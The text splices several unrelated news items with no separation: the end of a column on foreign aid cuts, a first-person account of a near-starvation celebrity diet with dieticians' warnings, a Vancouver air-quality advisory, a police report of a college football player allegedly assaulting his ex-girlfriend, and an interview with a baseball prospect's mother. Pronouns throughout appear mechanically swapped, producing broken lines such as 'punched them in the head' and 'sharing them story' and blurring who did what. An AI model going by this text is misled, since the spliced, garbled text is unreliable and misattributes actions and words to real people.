Pushing the foreign aid cuts is way to cynically promote the administration's “America first” political message while exploiting the public's misunderstanding of how much the country truly spends on foreign aid. Public polling has consistently shown that people wrongly believe the U.S. spends 10 percent to 25 percent of its budget on foreign aid. The real figure? It's less than 1 percent. By boasting that paring back assistance to other countries can pay for a massive bump in military spending, the Trump administration is appealing to nationalist fervor while obscuring the fact that other, more politically popular programs will also have to take a hit.
At some point, presumably, the ill-gotten “populist” sheen will finally be rubbed off President Trump. Hopefully that moment will come before they can gut the welfare state entirely and zero out the tax liability for rich people like himself.
I've got my Gwyneth Paltrow-body...but the Tracy Anderson Method left me so starved I suffered blackouts
Gwyneth Paltrow calls personal trainer Tracy Anderson their 'pint-sized miracle and the exercise genius of all time'.
And who can blame her? After all, Tracy is responsible for giving the 38-year-old actor and mother of two the kind of bikini body an Amazonian tiger-wrestler would be jealous of.
So when Gwyneth went on Oprah last year and revealed the painful lengths they go to to maintain their Hollywood figure - with Tracy's help - I wondered, could I do that?
Rebecca Wilcox (left) after following the 30-Day Method. Gwyneth Paltrow (right) showing off their toned body during a beach holiday in the Caribbean last month
And I wasn't alone. Tracy, a former dancer, and savvy Gwyneth are now business partners. Together they've produced four exercise DVDs - each of which has sold in excess of 20,000 copies in Britain alone - and a book, Tracy Anderson's 30-Day Method.
Released in December it is shifting around 1,000 units a week, a number no doubt boosted by Tracy's A-list clients who include Madonna, Shakira, Penelope Cruz and Nicole Richie.
According to Tracy all we have to do to get Gwyneth's figure is exercise for two hours every day, six days a week for the rest of our lives. Oh, and eat only according to their strict diet plan.
But who has the time and inclination to do that? Well, me. I work from home a lot, I have no children and only a small flat to look after.
I also had a size-12 body that wasn't getting any slimmer despite owning more than 100 exercise DVDs ranging from faddy to fantastic. I have done yoga, pilates, jogging, weightlifting, swimming, aerobics and dancing.
I even had a personal trainer at one point and, before you ask, yes, I have also tried several diets, including a hideous, practically food-free 10-day detox after which I didn't lose a single pound.
Working out: Gwyneth in the gym with fitness guru Tracy Anderson, whom they have called their 'pint-sized miracle and the exercise genius of all time'
Maybe my goal to get a celeb's body is a little too ambitious. But my job involves me looking good on TV presenting on the BBC's Watchdog programme, and I really wasn't happy with my figure (something I have in common with most women, according to every survey published on the subject).
So I bought into the Tracy Anderson Method, got hold of their DVDs and books, and ordered their latest boxed set, Metamorphosis: A Complete Body Transforming System, a 90-day programme you graduate to after completing the 30-Day Method, and which is available only from Tracy's website.
I have to say, Gwyneth made it look rather too easy. On the 30-Day Method you have to do to three hours of exercise a day, which decreases to one hour on the 90-day plan.
It basically involves doing jazzy leaps, star jumps and aerobic moves in my living room.
Tracy is totally against other forms of cardio, such as running, where you repeat your movements over and over. That, they say, will bulk muscles.
Along with the aerobics you must do a series of 40 toning Pilates-style moves, which change every ten days. It is gruelling and also mind-numbingly boring. I find myself staring at pictures of Gwyneth in their bikini for 'thinspiration'.
Yet all this would have been bearable if it hadn't been for the diet part of the regime. On the first week of the plan I'm only allowed to eat seven different foods, mostly blended.
These include the dreaded Power Juice made from kale, spinach, beetroot and apple. It is so disgusting I drink it over the sink in case my body rejects it (which happened on several occasions).
Then there is the Sweet Potato Corn Pudding ( one cooked sweet potato, one raw corn on the cob - blended together till smooth); the carrot parsnip puree (carrots and parsnips - blended); the blueberry and apple sauce (blended until smooth); the gazpacho (also blended until smooth) and protein soup ( surprisingly not blended).
Tracy says eat when you feel like it but I try to divide the foods as equally possible into breakfast, lunch and dinner.
Apart from the protein soup, which is carrots, celery, broccoli and chicken breast cooked in low-sodium stock, I don't actually chew anything for a whole week.
This was excruciating. It took the best part of a day to make everything in preparation for the week and after all that I didn't feel like I had any real food. I was starving.
But then with the onset of week two the diet only got harder and had me yearning for the good old days of pureed spinach.
Breakfast is two eggs (boiled or poached) or turkey bacon with a small amount of fruit.
Lunch is a protein bar. Dinner is a small amount of protein and veg. For example, I could have half a chicken breast with a handful of spinach. I would go to bed so hungry that I could hardly sleep.
I feel faint on several occasions and in the middle of Oxford Street everything starts to black out.
Thankfully, week three goes back to the blended foods-only phase.
Everything is grilled, steamed or poached. There seems to be a ban on starches in general. No bread, potatoes, pasta or rice. There are no fats, no dairy, no salt and no red meat.
Having completed the 30-Day Method I am currently on the 90-day plan. The results?
Well, I'm no Gwynnie but since January I have lost a stone in weight and dropped from dress size 12 to 10. I am happier with my body than I have been for a long time.
Those are the positives.
On the downside I feel woozy and find it difficult to concentrate. At first I had loads of energy but now I'm always tired and am told I'm horribly grouchy to boot.
Tracy Anderson's latest book
My skin is terrible and my nails are flaking and weak. And - how can I put this - my system has become, shall we say, somewhat sluggish. Normally I'm as regular as clockwork. Not any more.
I am encouraged to weigh myself daily and measure my results with the 'Tracy tape measure' every ten days.
At first this made me feel quite uncomfortable but now I'm fanatical about my daily weigh-in and refuse to eat or drink anything until I know my weight first.
Tracy makes no mention of the amount of calories or fat you are supposed to consume a day so I take my plan to Catherine Collins, principal dietician at St George's Hospital, London, to get it analysed. The results are shocking.
They told me I had existed on less than 700 calories a day for the past two months - no wonder I felt terrible. Catherine was extremely concerned.
'I see patients suffering with anorexia nervosa and now I'm reading their diet in pamphlet form,' they say. 'It's immunosuppressant due to its lack of calcium, iron, carbohydrates, proteins and salt.
'If you followed the regimen you would risk developing hyponatremia (low sodium levels in the blood). The diet is also very low in iron, which could lead to anaemia and problems with balance, muscle strength and exhaustion.
'The lack of absorbable calcium (less than 300mg - the body needs 800mg a day) means you risk earlyonset osteoporosis and osteopenia too - something that Gwyneth has been diagnosed with.
What's more, the protein levels are low - less than 1.7oz per day, which can be dangerous if prolonged.
'Even the vitamins that are available cannot be absorbed since there is no fat present in the diet to act as an absorption vehicle, so they will just be excreted from the body.'
As part of the Metamorphosis plan you gain access to an internet chat room devoted to Tracy and their Method. It is filled with adoring fans sharing tips for weight loss and offering support. Many women on the Metamorphosis website are also concerned about the diet and opt to only follow the exercise element - something that Tracy opposes.
'If you only follow the food plan partially or not at all I cannot promise results,' they write.
I went on the forum to voice concerns about the wisdom of the diet and was told sternly to 'trust in Tracy Anderson' and 'believe in The Method'. I noticed my comments were later removed.
Dr Susan Jebb, head of Nutrition and Health Research at the Medical Research Council, was not surprised by my weight-loss results.
'Of course you're going to lose weight - you're eating 700 calories a day,' they say. 'People who are not overweight shouldn't go on these crash diets. They can be useful for patients who are very obese but not for someone like you.'
According to Dr Jebb, I should be consuming around 2,400 calories a day to maintain my weight when exercising as much as I am.
They explain: 'A deficit of just 1,000 calories a day means you will lose 2lb a week. On this diet you would have a deficit of 1,700 calories a day.'
Dr Jebb went on to explain that there are guidelines for such low-calorie diets which mean you should be monitored by a health practitioner to make sure your heart and other major organs don't suffer any consequences.
A sustained calorific intake at this level would mean a loss of nearly 4lb a week. And as Catherine Collins explains, it won't be just fat that starts to disappear.
If you exercise at the rate the plan demands and eat less than 2.1oz of protein a day your body will then cannibalise your organs - your kidneys, liver and heart - to get the protein it needs,' they say.
'This is why anorexia sufferers can die of heart attacks. The low level of carbohydrates (only 1.6oz on some days) is well below the 2.4oz that an average woman would need if they were exercising.
'This could also lead to a breakdown of the muscles, a deterioration of motor skills and a diminished organ size. It's the worst thing to do when you're exercising.'
Jo Doust, professor of physiology at the University of Brighton, says there's nothing new or magical about Tracy Anderson's exercises.
They say: 'She claims you can re-engineer your muscular structure and defy your genetics through their programme, but you just can't do that.
'You can develop your muscles but you can't defy your genetics. Them exercises aren't special - you could get a similar plan from any trainer in any gym.'
When I started the Tracy Anderson Method I was a massive fan and I wanted to tell everyone that I had found the holy grail of dieting. But now I see how wrong I was.
The exercises have worked for me so I'm going to keep going with them for as long as the novelty holds out but I have stopped the diet.
For now I can only wonder at the stamina needed to get the body that Tracy's method promises.
Representatives of Tracy Anderson did not respond to requests for a statement about Rebecca's experience.
Metro Vancouver is advising people in eastern areas of Metro Vancouver and the Fraser Valley to avoid strenuous outdoor activities during mid-afternoon because of high levels of air pollution.
The regional district says high concentrations of ground-level ozone are expected to persist until the weather changes sometime in the next few days.
Exposure is particularly a concern for infants, the elderly and those who have underlying medical conditions such as lung or heart disease and asthma.
"If you are experiencing symptoms such as chest discomfort, shortness of breath, cough or wheeze, follow the advice of your health care provider and stay indoors in air conditioned spaces," said the advisory.
The provincial government's Air Quality Health Index is also forecasting pollution levels across the region will range between four and five on a scale of one to ten on Monday before dropping slightly on Tuesday.
While ozone in the earth's upper atmosphere helps block harmful ultraviolet rays from the sun, at ground level it can cause health problems for humans.
Ground-level ozone is formed from several factors including nitrogen from vehicles and other fossil fuel consumption, volatile organic compounds from sources such as paint, and hot weather and sunlight.
Over the weekend heat records were broken in several parts of B.C. and number of wildfire continues to grow.
TCU defensive end Devonte Fields is under investigation by police after their ex-girlfriend accused them of pointing a gun at her, threatening” I should blast you!” then punching them in the head at a Fort Worth home Sunday.
Fields had allegedly left the scene before officers' arrival, according to a Fort Worth police report.
“Devonte Fields has been listed as a suspect on a domestic disturbance in Fort Worth,” confirmed Sgt. Raymond Bush, a police spokesperson. “He has not been arrested.”
On Tuesday, TCU released a statement saying Fields had been “separated” from the university pending results of the investigation.
Sign Up and Save Get six months of free digital access to the Star-Telegram
Head football Coach Gary Patterson said, “what that means is right now he's not allowed to be on school premises.”
Fields, 21, who only played three games last year because of injury, has been selected as the preseason defensive MVP of the Big 12.
Patterson said they would let justice take it course before making a decision on Fields.
“My job is to protect the university,” Patterson said. “… So we'll see how the investigation goes, and then we'll find out what they have to say.”
Should Fields not play this season, Patterson said, “Well, we were the No. 2 defense in the league without them a year ago. So we'll go play and do what we need to do.”
TCU begins practice Aug. 4.
‘Punched them in the face'
Police had been called to a domestic disturbance about 3:30 a.m. Sunday in the 2700 block of Lubbock Avenue in Fort Worth.
There, 20-year-old Haley Brown, also a TCU student, told officers that Fields had apparently been standing outside the bedroom window listening to their talk to a mutual male friend. Brown told police Fields then punched out the window of their friend's bedroom from the outside and began yelling at them
“Haley stated that they thought Devonte was holding a gun in one of their hands and stated that they pointed it at her,” the report states.
“I should blast you!” they yelled at Haley, according to the report.
The report states Fields then came to the home's front door and was let inside by their mutual friend's roommate.
“Haley stated that Devonte continued to yell at them and punched them in the face one time with a closed fist,” the report states
Officers observed Haley's right cheek to be swollen with a small cut under their eye. They refused to be taken to the hospital for further evaluation and told officers they did not want to pursue charges against Fields.
Police, however, told them that a report and family violence packet must be completed.
Haley told police they had dated Fields, a former standout player at Arlington Martin High School, for two years but that the couple had broken up on June 1.
Incident in January
In January, Fields had reported to Fort Worth police that they were robbed and beaten in a struggle involving gunfire outside their residence in the 3200 block of South University Drive.
According to that report, Fields told police that three men came up behind them as they were walking to their residence, pistol-whipped him, and pushed them inside. They said two of the suspect then assaulted them while the third stole a cellphone, baseball caps, a pair of tennis shoes and an Xbox video game system.
Fields told police that the struggle moved outside, where one of the suspected pointed a gun at them and threatened to kill him. They said they grabbed that suspect's forearm and that five shots were fired into the air before the suspects fled in a Honda. Police collected five spent .40-caliber casings from the yard near the driveway.
Fields later told police that they did not want officers to look inside their residence and that “he did not want to press charges,” according to a police report.
Staff writer Carlos Mendez contributed to this report.
As a parent, you always try to provide your children with the best that you can and help guide them through their life's journey. Allie Littell has been there every step of the way as their son, New York Yankees prospect, Zack Littell, makes their way through the minor leagues. We had the opportunity to interview Allie Littell about their experiences as the mother of a minor league baseball player.
Zack Littell was drafted out of high school as a 17-year-old senior, out of Eastern Alamance High School, located in Mebane, North Carolina. Being drafted is the continuance of a dream and with it came a tsunami of emotions, altering the course that Allie expected Zack to follow.
“Honestly, I think we were both in a little bit of shock initially. As a parent, I had spent the last 13 years of their academic life setting up the expectation that college would be after high school, how important it was, and how it was just the next step. When the likelihood of the draft occurred, just weeks before graduation, we had a lot to process, and a lot to learn (amidst Senior Proms, Senior Projects, High School Baseball Playoffs, etc). Even at that point, some part of me just didn't believe it might happen, which left me in a position of even more surprise when it actually did.
Then there was the whirlwind. They graduated on a Friday evening, the evening of day 1 of the draft. All seniors were not allowed access to their cell phones during the ceremony. Zack had been given permission to keep his, hand it to a teacher on one side of the stage, receive their diploma, and meet that same teacher on the other side of the stage to get it back. During the ceremony, their phone rang 4-5 times, with calls from scouts or agents. It was very stressful for us all. Now we laugh, but one of those phone calls (came) from a scout during the ceremony. Zack had to interrupt and whisper, “I'm sorry, I'm at my graduation,” and the scout said, “My bad, go get your diploma.” They were drafted the next day, Saturday, and we flew to Seattle on Tuesday to sign, and they went straight to Arizona from there. At that point, I think it had all happened so fast, that I don't think either one of us had time to feel much and no time to let it really sink in.”
While the winds of change were blowing through the Littell's lives, they would provide their son with clarity and perspective to get through the signing process with the Mariners.
“When things got stressful, which they did, the night of their graduation and the following day, between graduation, their phone ringing constantly, and truly NOT knowing what they were going to do at any given moment. They and I had one quiet moment in their room when we had just gotten home from graduation late Friday night. They admitted they didn't know what to do, or what the right thing to do was and they didn't want to make the wrong decision. Scouts were calling and asking if they would accept if they drafted in xx round for xx dollars and it had become quickly overwhelming. I said to him, “Zack, take the money off of the table, this isn't about money. It's about what YOU want to do. Don't even think about the money. What do YOU want to do, what does your HEART say?” They looked right at me and said, “I want to play baseball”. I said, “So there is your decision, let's do this. If that's what your heart says, then it's what you need to do. No matter how this turns if you do your best and give it your best shot, when it's over, you won't have regret. You won't wonder what would have happened IF you had tried it. If that's where your heart is and you don't try it, you will always wonder “what if”, and I don't want that for you.”
That moment gave us both some peace with the decision that we both needed. I'll never forget that moment, it was as meaningful and important to me as the moment they called their name.”
Watching their son leave and pursue their opportunity to play professional baseball wasn't easy and brought many feelings to the surface.
“Well, I'd be lying if I said that I didn't walk away from my 17-year-old son in the Seattle airport, with them headed to one terminal and a flight to Phoenix, and I headed to another and on a flight home without him, sobbing. We're close, we always have been. They were 17 years old, three days out of high school, and had rarely spent more than a few nights at a time away from home, and even that (was) usually with other family members. They were heading to chase their dream, but into a world of the unknown, and without the support system he'd always known. I was terrified. I'm sure they were too.”
Being a prospect in the minor leagues means assignments anywhere in the country. That can create many logistical issues for family members, luckily, one of their assignments was to home with the former Pulaski Mariners.
“For me, the first adjustment was to not being able to be their biggest fan. I don't know that I missed more than a couple of games or events in their entire life (yes, I'm THAT mom, lol). All of a sudden, they were doing the biggest thing they had ever done, and I couldn't be there to see it. I did go to Phoenix a couple of times that first Summer, but it was quite an adjustment from having full access to their games and events. Luckily, their first assignment was for the Pulaski Mariners in Pulaski, VA, just less than three hours from home. So, that first Summer, their girlfriend and I were able to make EVERY single start of his, usually with a car or two full of other family members and friends. It was a good transition that for us, and for him, to not be totally disconnected.
The minor leagues aren't for the faint of heart. It's a long, grueling schedule and contrary to popular belief the players aren't staying in five-star hotels and eating at exclusive restaurants. Seeing the reality of the lifestyle, Littell did what any mother would do and helped.
“When they arrived in Clinton, IA last year, they showed up with a suitcase of their clothes, their equipment and that's all. They moved into the living room and slept on the floor in an apartment with a handful of other players on the team. So, that translates into no bed, no towels, no dishes, and no car. I immediately ordered them an air mattress and some towels online and arranged to go as soon as possible and take them their car. I also reached out to our community and asked if anyone had extra sheets, blankets, towels, pots, and pans, etc to donate (as we found that many players didn't have those basics or a way to get them).
We had a large response and we took two large cars FULL of stuff to distribute to several apartments of players. When I arrived, I was shocked at how little they all had, and how much they needed. We hit a lot of thrift stores and Goodwill stores and got the basics, but it's hard to see your child go without, and to realize how little many MiLB players have.
Sadly, when they get moved, that stuff usually has to stay, and then you start all over again at the next stop. In Iowa, Zack spoke to the team Chaplain, and their church agreed to store the items after the season to distribute to players coming in the next season. This season, when they moved to Bakersfield from Iowa mid-season, we had just a few hours notice. Zack gave what they could to other players, stored what they could in their car (which we had to go to Iowa and pick up), and landed in Bakersfield in the same manner. No bed, no towels, no car.
At this point, Zack was still 20, so they couldn't rent a car, (and) they couldn't sign for a hotel room. The first night, I made about 10-12 calls before I found a hotel that would allow me to book and pay for the room, allow them to check in and hopefully get a good night's sleep. They were scheduled to make their first start the next day. The good news is, that it gave me another reason to go see him. We did all of those things again and got them settled on an air mattress, in a living room with a handful of other players (and I got to be there for that first start). People don't realize that's truly how most of them live. Honestly, I think it probably is more upsetting to the parents than the players. Zack has handled it very well at each juncture. But moms are still moms, and we worry.”
As a parent, you take great pride in your children, their accomplishments and how they conduct themselves. Littell takes great pride in the traits that their son has shown as a professional.
“That they continue to still be who they are. That they remain grateful for the opportunity that he's been given, that they don't take it for granted, that they remain humble and grounded, and that he's committed to giving it 100%.”
Baseball has a way of throwing players and their families a curveball from time-to-time. The Littell family received theirs on November 18 when the Mariners traded them to the New York Yankees.
“That was another whirlwind night. It was an absolute complete surprise to us both. Their younger brother was in the first round of high school football playoffs that night, and we were eating at the same local pizza place we eat before every home football game. Zack stepped out to take a call while we were finishing up. I didn't think a thing about it. When I got into the car, they were still on the phone and when they hung up, they looked absolutely shocked. They said, “I've been traded to the Yankees.” I don't think we knew what to say or how to feel, to be honest. But it sunk in fairly quickly. Truthfully, my first thought [was] They WILL BE ON THE EAST COAST! SAME TIME ZONE! DRIVING DISTANCE! Zack made the decision not to tell anyone until after their brother's playoff game. They didn't want to take away from their evening. That night we celebrated their brother's win, and the next day, we celebrated Zack's news.”
Allie Littell has watched their son grow as a professional baseball player and as a man, with their support every step of the way. We want to thank Allie for taking time out of their schedule and for sharing them story.
*Photo courtesy of Allie Littell.
Total 0 Votes 0 0
